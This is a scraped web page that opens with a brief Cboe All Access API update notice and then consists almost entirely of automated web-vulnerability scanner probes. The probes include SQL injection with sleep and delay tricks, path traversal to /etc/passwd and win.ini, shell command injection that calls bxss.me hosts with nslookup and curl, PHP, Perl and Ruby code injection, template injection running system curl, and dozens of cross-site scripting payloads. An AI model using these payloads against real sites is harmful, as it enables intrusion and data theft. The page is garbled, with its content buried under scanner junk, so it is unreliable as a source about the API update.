Cboe All Access API Updates - Enhanced Usage Tracking and New Endpoint
Thursday, September 23, 2021
- Trade Optimizer has now been migrated to All Access APIs. Check it out here.
- To help subscribers better plan their usage, paying subscribers will now be notified via email once they reach 80%, 90%, 100%, 125%, 150% of their monthly points allowance.
- Daily points allowance for Free Tier has increased from 100 to 500.
-1 OR 2+625-625-1=0+0+0+1 --
-1 OR 3+625-625-1=0+0+0+1 --
-1 OR 2+519-519-1=0+0+0+1
-1 OR 3+519-519-1=0+0+0+1
-1' OR 2+576-576-1=0+0+0+1 --
-1' OR 3+576-576-1=0+0+0+1 --
-1' OR 2+34-34-1=0+0+0+1 or 'YwLgHaPh'='
-1' OR 3+34-34-1=0+0+0+1 or 'YwLgHaPh'='
-1" OR 2+780-780-1=0+0+0+1 --
-1" OR 3+780-780-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
8wQRQpBM'; waitfor delay '0:0:15' --
-5 OR 900=(SELECT 900 FROM PG_SLEEP(15))--
-5) OR 899=(SELECT 899 FROM PG_SLEEP(15))--
-1)) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
neBMHVcX' OR 58=(SELECT 58 FROM PG_SLEEP(15))--
khvhD6Kj') OR 276=(SELECT 276 FROM PG_SLEEP(15))--
LuJN1qqh')) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1 ????%2527%2522
@@8anH7
j5sjFhaO
1*
1*
1*
1*
-1 OR 2+341-341-1=0+0+0+1
-1 OR 3+341-341-1=0+0+0+1
RLIKE (SELECT (CASE WHEN (327=327) THEN 1 ELSE 0x28 END)) --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
hudGOGdT'; waitfor delay '0:0:15' --
-5 OR 356=(SELECT 356 FROM PG_SLEEP(15))--
-5) OR 654=(SELECT 654 FROM PG_SLEEP(15))--
-1)) OR 445=(SELECT 445 FROM PG_SLEEP(15))--
T5d996BU' OR 912=(SELECT 912 FROM PG_SLEEP(15))--
PERiqQfd') OR 715=(SELECT 715 FROM PG_SLEEP(15))--
6O5fe9wt')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1 ????%2527%2522
@@DGWuE
555
response.write(9712026*9076395)
'+response.write(9712026*9076395)+'
"+response.write(9712026*9076395)+"
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
555<esi:include src="http://bxss.me/rpb.png"/>
../555
555
555
555
555
555
555
${9999243+10000324}
555
555
echo ircrkt$()\ svbzqr\nz^xyu||a #' &echo ircrkt$()\ svbzqr\nz^xyu||a #|" &echo ircrkt$()\ svbzqr\nz^xyu||a #
555
&echo twcrql$()\ sxmkvd\nz^xyu||a #' &echo twcrql$()\ sxmkvd\nz^xyu||a #|" &echo twcrql$()\ sxmkvd\nz^xyu||a #
555&echo fxsjfz$()\ dymkcf\nz^xyu||a #' &echo fxsjfz$()\ dymkcf\nz^xyu||a #|" &echo fxsjfz$()\ dymkcf\nz^xyu||a #
555
|echo pqhekw$()\ bgqhyq\nz^xyu||a #' |echo pqhekw$()\ bgqhyq\nz^xyu||a #|" |echo pqhekw$()\ bgqhyq\nz^xyu||a #
555|echo sacvzu$()\ zxptme\nz^xyu||a #' |echo sacvzu$()\ zxptme\nz^xyu||a #|" |echo sacvzu$()\ zxptme\nz^xyu||a #
expr 9000256921 - 957324
555
(nslookup -q=cname hitnbqbdumoce4654a.bxss.me||curl hitnbqbdumoce4654a.bxss.me))
555
$(nslookup -q=cname hitvsiucwvuwkd6279.bxss.me||curl hitvsiucwvuwkd6279.bxss.me)
555
&nslookup -q=cname hitmapfzeqxmvb73de.bxss.me&'\"`0&nslookup -q=cname hitmapfzeqxmvb73de.bxss.me&`'
555
&(nslookup -q=cname hitvyfcysscqoa88ff.bxss.me||curl hitvyfcysscqoa88ff.bxss.me)&'\"`0&(nslookup -q=cname hitvyfcysscqoa88ff.bxss.me||curl hitvyfcysscqoa88ff.bxss.me)&`'
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
|(nslookup -q=cname hitjacejuhoup02fbf.bxss.me||curl hitjacejuhoup02fbf.bxss.me)
`(nslookup -q=cname hitnpqpfpjlfr4580f.bxss.me||curl hitnpqpfpjlfr4580f.bxss.me)`
/etc/shells
../../../../../../../../../../../../../../etc/shells
;(nslookup -q=cname hitholhrvqfksc1019.bxss.me||curl hitholhrvqfksc1019.bxss.me)|(nslookup -q=cname hitholhrvqfksc1019.bxss.me||curl hitholhrvqfksc1019.bxss.me)&(nslookup -q=cname hitholhrvqfksc1019.bxss.me||curl hitholhrvqfksc1019.bxss.me)
c:/windows/win.ini
|(nslookup${IFS}-q${IFS}cname${IFS}hitrpgnfjlgfp56bf2.bxss.me||curl${IFS}hitrpgnfjlgfp56bf2.bxss.me)
)
bxss.me
!(()&&!|*|*|
&(nslookup${IFS}-q${IFS}cname${IFS}hitfefhjzdtypd58a3.bxss.me||curl${IFS}hitfefhjzdtypd58a3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfefhjzdtypd58a3.bxss.me||curl${IFS}hitfefhjzdtypd58a3.bxss.me)&`'
Http://bxss.me/t/fit.txt
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
https://datashop.cboe.com/
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitdh'.'njqfqwks95258.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(66).chr(106).chr(75).'
555
'"()
".gethostbyname(lc("hittg"."hanyzvbj5c3d2.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(71).chr(98).chr(73)."
555
555'&&sleep(27*1000)*ihqxpl&&'
gethostbyname(lc('hitve'.'zbcixaks2f073.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(88).chr(105).chr(66)
555
555"&&sleep(27*1000)*zijrjs&&"
555
555
555'||sleep(27*1000)*vljbeb||'
555
555"||sleep(27*1000)*jjyojb||"
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
HttP://bxss.me/t/xss.html?%00
555
'.print(md5(31337)).'
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(65).concat(110).concat(73)+(require"socket"
Socket.gethostbyname("hitgv"+"mhforwdod37a1.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(106).concat(81).concat(106).concat(83)+(require'socket'
Socket.gethostbyname('hitze'+'cpyvefzi8bbde.bxss.me.')[3].to_s)+'
555
'A'.concat(70-3).concat(22*4).concat(120).concat(87).concat(118).concat(86)+(require'socket'
Socket.gethostbyname('hitzq'+'lglwfbkh806e6.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
NewsCommentAdd
555
555
555
555
NewsCommentAdd/.
555
555
555
555
'"
555
<!--
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >K9dt(9831)</ScRiPt>
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitjreopfbnalbd11e.bxss.me")}}
'"()&%<zzz><ScRiPt >K9dt(9456)</ScRiPt>
5559445871
bfg8004<s1﹥s2ʺs3ʹhjl8004
bfgx10093%C0%BEz1%C0%BCz2a%90bcxhjl10093
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >K9dt(9996)</ScRiPt>
555<WHSSA5>UWAFN[!+!]</WHSSA5>
555<script>K9dt(9149)</script>
555<script>K9dt(9216)</script>9216
555<ScR<ScRiPt>IpT>K9dt(9460)</sCr<ScRiPt>IpT>
555<ScRiPt
>K9dt(9341)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9778></ScRiPt>
555<isindex type=image src=1 onerror=K9dt(9056)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9052'>
555<body onload=K9dt(9234)>
555<img src=//xss.bxss.me/t/dot.gif onload=K9dt(9828)>
555<img src=xyz OnErRor=K9dt(9656)>
555<img/src=">" onerror=alert(9972)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4B%39%64%74%289123%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\K9dt(9571)\u003C/sCripT\u003E
555<ScRiPt>K9dt(9695)</sCripT>
%F6<img zzz onmouseover=K9dt(93091) //%F6>
555<input autofocus onfocus=K9dt(9217)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(K9dt(9098))}
555SHqCy
<ScRiPt >K9dt(9908)</ScRiPt>
555<W5XR4K>MDVGC[!+!]</W5XR4K>
555<ifRAme sRc=9875.com></IfRamE>
555<abnwASE x=9662>
555<img sRc='http://attacker-9410/log.php?
555<aOt1nLN<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'shBVVvIQ'='
-1" OR 5*5=25 or "krQWSAir"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555fyCVWosJ'; waitfor delay '0:0:15' --
555-1 OR 623=(SELECT 623 FROM PG_SLEEP(15))--
555-1) OR 979=(SELECT 979 FROM PG_SLEEP(15))--
555-1)) OR 388=(SELECT 388 FROM PG_SLEEP(15))--
555YwsWAKBb' OR 209=(SELECT 209 FROM PG_SLEEP(15))--
555JiVazHY7') OR 33=(SELECT 33 FROM PG_SLEEP(15))--
555xFKvgsqU')) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@1Pjzm
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555